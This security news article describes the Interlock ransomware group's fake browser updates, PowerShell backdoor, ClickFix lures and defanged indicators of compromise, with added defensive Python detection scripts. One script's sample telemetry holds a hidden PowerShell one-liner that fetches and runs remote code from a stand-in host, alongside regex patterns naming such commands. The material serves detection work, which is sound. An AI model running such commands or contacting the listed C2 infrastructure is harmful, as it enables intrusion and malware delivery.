Friday, May 9, 2025

Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates


The Interlock ransomware intrusion set has escalated its operations across North America and Europe while steadily refining its tooling and delivery techniques.

Not falling under the typical Ransomware-as-a-Service (RaaS) category, Interlock operates independently, focusing primarily on Big Game Hunting and double extortion campaigns.

This group’s activities have been closely monitored by cybersecurity firms such as Sekoia Threat Detection & Research (TDR) and others, revealing their evolving tactics and tools.


Attack Mechanism and Execution

Interlock initiates its attack by compromising legitimate websites to host deceptive browser update pages, leveraging the trust users have in these platforms.

[Figure: Screenshot of Interlock's data leak site (DLS)]

Here’s how the attack unfolds:

1. Fake Updater Deployment:

    The ransomware's initial access vector is a fake browser update hosted on compromised websites.

    These updates appear as legitimate Google Chrome or Microsoft Edge installers but are, in fact, PyInstaller-packaged executables. When a user executes this update, it:

    • Downloads and runs a legitimate installer, so the victim sees the expected setup flow.
    • Simultaneously launches a PowerShell script that acts as a backdoor.

2. PowerShell Backdoor:

    This script operates in a loop, continuously issuing HTTP requests to communicate with command-and-control (C2) servers. It is designed for resilience, utilizing:

    • A continuous communication loop with the C2 server for persistence.
    • Collection of system information, including user context and system details, which it transmits to the attacker.

3. Command Execution:

    The C2 server can issue various commands, including:

    • Terminating the backdoor.
    • Deploying additional malware such as keyloggers or credential stealers (e.g., LummaStealer, BerserkStealer).
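The fake updater described above is a PyInstaller bundle posing as a Chrome or Edge installer, and a genuine Chrome or Edge installer is never built with PyInstaller, so the packer itself is the quickest triage signal. The following is an added example written for this article, not code from the report or from Interlock's tooling. It relies on one fact about PyInstaller: the bootloader is followed by an archive that ends in a cookie beginning with a fixed magic string (the `MEI` bytes below), which onefile builds keep near the end of the executable unless another overlay, such as an Authenticode signature, is appended after it. The filename heuristic and the two sample byte strings are assumptions constructed for the demonstration, not real samples.

```python
"""Triage a binary that was served as a browser update.

Added example; not code from the article, from Sekoia's report or from
Interlock's tooling. The sample byte strings are constructed stand-ins.
"""
import hashlib

# First bytes of the PyInstaller archive cookie (PYINST_COOKIE_MAGIC).
PYINSTALLER_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 for lookup against published IoC hashes."""
    return hashlib.sha256(data).hexdigest()


def pyinstaller_cookie_offset(data: bytes) -> int:
    """Offset of the PyInstaller cookie magic, or -1 if the file has none.

    rfind is used because the magic could also occur inside an embedded
    archive; the last occurrence is the one that terminates the bundle.
    """
    return data.rfind(PYINSTALLER_COOKIE_MAGIC)


def looks_like_browser_installer(name: str) -> bool:
    """Assumed heuristic: the lure names the file after Chrome or Edge."""
    n = name.lower()
    return n.endswith(".exe") and ("chrome" in n or "edge" in n)


def triage(data: bytes, claimed_name: str) -> dict:
    """Verdict for a download presented as a browser update."""
    offset = pyinstaller_cookie_offset(data)
    packed = offset != -1
    return {
        "name": claimed_name,
        "sha256": sha256_hex(data),
        "pyinstaller": packed,
        "cookie_offset": offset,
        # A PyInstaller bundle masquerading as a browser installer is
        # exactly the fake-updater pattern the article describes.
        "fake_updater_pattern": packed and looks_like_browser_installer(claimed_name),
    }


# Constructed stand-ins: a minimal MZ/PE-looking header, once with a
# PyInstaller cookie appended and once without.
_HEADER = b"MZ" + b"\x00" * 58 + b"PE\x00\x00"
FAKE_UPDATER_SAMPLE = _HEADER + b"\x90" * 32 + PYINSTALLER_COOKIE_MAGIC + b"\x00" * 80
BENIGN_SAMPLE = _HEADER + b"\x90" * 120

if __name__ == "__main__":
    for name, blob in (("ChromeSetup.exe", FAKE_UPDATER_SAMPLE),
                       ("MicrosoftEdgeSetup.exe", BENIGN_SAMPLE)):
        print(triage(blob, name))
```

On a real download, read the file into `data` and pass the name the lure gave it; a `pyinstaller` hit on anything calling itself a browser installer is worth quarantining before the hash is even checked against the IoC list.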

Domain and IP Clustering for Resilience

According to Sekoia's report, Interlock's operators employ a strategy of IP address clustering to maintain their infrastructure's resilience:

Cluster Composition

Each cluster typically includes:

• One IP from BitLaunch, a hosting provider that accepts cryptocurrency payments.
• One from Hetzner Online GmbH, known for its robust hosting services.
• A third from various other autonomous systems, so that a takedown at any single provider does not disable the cluster.

ClickFix Technique for Initial Access

Around January 2025, Interlock adopted the ClickFix technique:

• Deceptive Prompts: Victims are persuaded to manually execute malicious PowerShell commands through fake CAPTCHA verifications or system prompts.
• Fake Installer Distribution: This technique was used to distribute a fake installer payload, but its use appears to have been abandoned by February 2025.
[Figure: Fake Cloudflare CAPTCHA asking users to execute a command to access a website]
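ClickFix only works if the victim pastes the command into the Run dialog or a terminal, which leaves a distinctive parent/child relationship in process telemetry: the shell is spawned by explorer.exe (Win+R) or an interactive console rather than by a script host, scheduler or service. The hunt below is an added example, not part of the article or Sekoia's report. The records are constructed in the shape of Sysmon Event ID 1 (the `Image`, `ParentImage` and `CommandLine` field names are Sysmon's; the values are made up), and the list of suspicious argument patterns is an assumption based on common ClickFix one-liners, not on the specific command Interlock's lure used.

```python
"""Hunt for ClickFix-style executions in process-creation telemetry.

Added example; not from the article or from Sekoia's report. SAMPLE_EVENTS
are constructed records in Sysmon Event ID 1 shape.
"""
import re

# Tokens that commonly appear in pasted ClickFix one-liners: hidden window,
# encoded or downloaded payload, bypassed execution policy. Assumed list.
SUSPICIOUS_ARGS = [
    r"-w(?:indowstyle)?\s+hidden",
    r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    r"-ep\s+bypass|-executionpolicy\s+bypass",
    r"invoke-webrequest|iwr\b|irm\b|invoke-restmethod",
    r"downloadstring|downloadfile",
    r"iex\b|invoke-expression",
    r"mshta\b",
]
ARG_RE = re.compile("|".join(SUSPICIOUS_ARGS), re.IGNORECASE)

# Parents a human pastes into: explorer.exe is the Win+R path, the others
# cover a command pasted into an open console.
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "windowsterminal.exe")
SHELLS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_candidate(event: dict) -> bool:
    """Flag a shell launched interactively with payload-fetching arguments."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image not in SHELLS or parent not in INTERACTIVE_PARENTS:
        return False
    return ARG_RE.search(event.get("CommandLine", "")) is not None


def hunt(events: list) -> list:
    return [e for e in events if is_clickfix_candidate(e)]


# Constructed telemetry. The first record mimics a fake-CAPTCHA paste: the
# Run dialog (explorer.exe) launches a hidden PowerShell that fetches and
# evaluates remote code. The second is a benign interactive command; the
# third has the same "bypass" argument but a non-interactive parent.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/additional-check)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile Get-Process"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Monitoring Agent\MonitoringHost.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("ClickFix candidate:", hit["CommandLine"])
```

The parent check is what keeps the rule quiet: management agents and schedulers legitimately run PowerShell with `-ExecutionPolicy Bypass` all day, but they do not do it as children of explorer.exe.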

The sophistication and evolution of Interlock's tactics, from fake browser updates to social engineering techniques like ClickFix, illustrate its adaptability and potential for further growth.

With a focus on high-value targets and delivery paths that bypass traditional network controls, Interlock remains a significant threat.

Defensive measures must be updated continuously to counter the changing strategies of this ransomware group.

Indicators of Compromise (IoC)

The following list gives the IoCs associated with Interlock's activities, grouped by category and indicator type. Indicators are defanged with "[.]", and the report's longer hash and URL lists are abbreviated here with "…".

Fake Updater (SHA-256): 576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296, f962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c, … (additional hashes)

ClickFix PowerShell Loaders (SHA-256): 5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e, eb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34, … (additional hashes)

Interlock RAT (SHA-256): 1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83, 299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2, … (additional hashes)

Keylogger (SHA-256): 5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8, df41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782, … (additional hashes)

BerserkStealer (SHA-256): eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692, a5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf

LummaStealer (SHA-256): 4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e

Windows Interlock ransomware (SHA-256): 4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9, 33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9, … (additional hashes)

Small autoremove DLL used by the ransomware (SHA-256): c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f

Linux Interlock ransomware (SHA-256): 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f

Data Leak Site (URL): http://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion

Backdoor C2 – Cluster 1 (IP address): 23.95.182[.]59, 195.201.21[.]34, 159.223.46[.]184
Backdoor C2 – Cluster 2 (IP address): 23.227.203[.]162, 65.109.226[.]176, 65.38.120[.]47
Backdoor C2 – Cluster 3 (IP address): 216.245.184[.]181, 212.237.217[.]182, 168.119.96[.]41
Backdoor C2 – Cluster 4 (IP address): 216.245.184[.]170, 65.108.80[.]58, 84.200.24[.]41
Backdoor C2 – Cluster 5 (IP address): 206.206.123[.]65, 49.12.102[.]206, 193.149.180[.]158
Backdoor C2 – Cluster 6 (IP address): 85.239.52[.]252, 5.252.177[.]228, 80.87.206[.]189
Backdoor C2 – Cluster 7 (IP address): 65.108.80[.]58, 212.104.133[.]72, 140.82.14[.]117
Backdoor C2 – Cluster 8 (IP address): 64.94.84[.]85, 49.12.69[.]80, 96.62.214[.]11
Backdoor C2 – Cluster 9 (IP address): 177.136.225[.]153, 188.34.195[.]44, 45.61.136[.]202

Compromised URLs (URL): http://topsportracing[.]com/wp-az, http://topsportracing[.]com/az10, https://airbluefootgear[.]com/wp-includes/images/xits.php, … (additional URLs)

ClickFix URLs (URL): https://microsoft-msteams[.]com/additional-check.html, https://microstteams[.]com/additional-check.html, https://advanceipscaner[.]com/additional-check.html, … (additional URLs)

PowerShell backdoor C2 domains (URL): refrigerator-cheers-indicator-ferrari[.]trycloudflare.com, analytical-russell-cincinnati-settings[.]trycloudflare.com, … (additional URLs)
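Two practical details of the list above matter when turning it into detections: the indicators are defanged with "[.]" and must be refanged before matching, and the backdoor C2 domains are Cloudflare quick-tunnel hostnames under trycloudflare.com, which the operators can rotate at will, so a hostname pattern catches tunnels the list does not name. The script below is an added example, not part of the article or Sekoia's report. It copies a handful of the indicators from the table (the table's own "…" elisions are not filled in) and matches them against proxy and EDR records that are constructed for the demonstration; the record field names (`url`, `dst_ip`, `sha256`, `host`) are assumptions.

```python
"""Refang the article's defanged IoCs and match them against telemetry.

Added example; not from Sekoia's report. The indicators are copied from the
IoC table; SAMPLE_EVENTS are constructed proxy/EDR records.
"""
import re

DEFANGED_IOCS = {
    "c2_ip": [
        "23.95.182[.]59", "195.201.21[.]34", "159.223.46[.]184",   # cluster 1
        "23.227.203[.]162", "65.109.226[.]176", "65.38.120[.]47",  # cluster 2
    ],
    "c2_domain": [
        "refrigerator-cheers-indicator-ferrari[.]trycloudflare.com",
        "analytical-russell-cincinnati-settings[.]trycloudflare.com",
    ],
    "clickfix_url": [
        "https://microsoft-msteams[.]com/additional-check.html",
        "https://advanceipscaner[.]com/additional-check.html",
    ],
    "sha256": [
        "1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83",  # Interlock RAT
        "4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e",  # LummaStealer
    ],
}


def refang(indicator: str) -> str:
    """Undo '[.]', '(.)', '(dot)' and 'hxxp' defanging; lower-case the result."""
    s = indicator.replace("[.]", ".").replace("(.)", ".").replace("(dot)", ".")
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s.lower()


IOCS = {cat: {refang(i) for i in vals} for cat, vals in DEFANGED_IOCS.items()}

# Any Cloudflare quick tunnel deserves a look on hosts that have no business
# using one; it catches rotated tunnels the table does not list.
QUICK_TUNNEL_RE = re.compile(r"(^|\.)trycloudflare\.com$", re.IGNORECASE)


def host_of(url: str) -> str:
    m = re.match(r"^[a-z]+://([^/:]+)", url, re.IGNORECASE)
    return (m.group(1) if m else url).lower()


def match_event(event: dict) -> list:
    """Return the IoC categories an event hits (empty list if clean)."""
    hits = []
    url = event.get("url", "")
    host = host_of(url) if url else event.get("host", "").lower()
    if event.get("dst_ip") in IOCS["c2_ip"]:
        hits.append("c2_ip")
    if host in IOCS["c2_domain"]:
        hits.append("c2_domain")
    elif host and QUICK_TUNNEL_RE.search(host):
        hits.append("quick_tunnel_pattern")
    if url and refang(url) in IOCS["clickfix_url"]:
        hits.append("clickfix_url")
    if event.get("sha256", "").lower() in IOCS["sha256"]:
        hits.append("sha256")
    return hits


def scan(events: list) -> dict:
    """Map event index -> categories hit, for events that hit anything."""
    result = {}
    for i, e in enumerate(events):
        hits = match_event(e)
        if hits:
            result[i] = hits
    return result


# Constructed telemetry: a listed tunnel, an unlisted tunnel, an EDR hash
# event with upper-case hex, a connection to a listed C2 IP, and a clean line.
SAMPLE_EVENTS = [
    {"src": "proxy", "url": "https://refrigerator-cheers-indicator-ferrari.trycloudflare.com/", "dst_ip": "104.16.0.1"},
    {"src": "proxy", "url": "https://quiet-orange-tunnel-demo.trycloudflare.com/", "dst_ip": "104.16.0.2"},
    {"src": "edr", "sha256": "1105A3050E6C842FB9411D4F21FD6FDB119861C15F7743E244180A4E64B19B83"},
    {"src": "proxy", "url": "https://update.example.invalid/ok", "dst_ip": "23.95.182.59"},
    {"src": "proxy", "url": "https://www.example.invalid/", "dst_ip": "93.184.216.34"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx], "->", hits)
```

Exact-match hits on a listed IP or hash are high confidence; the `quick_tunnel_pattern` hit is a lead rather than a verdict, because trycloudflare.com also has legitimate developer use, so it belongs in a hunting query rather than a blocking rule.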

Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
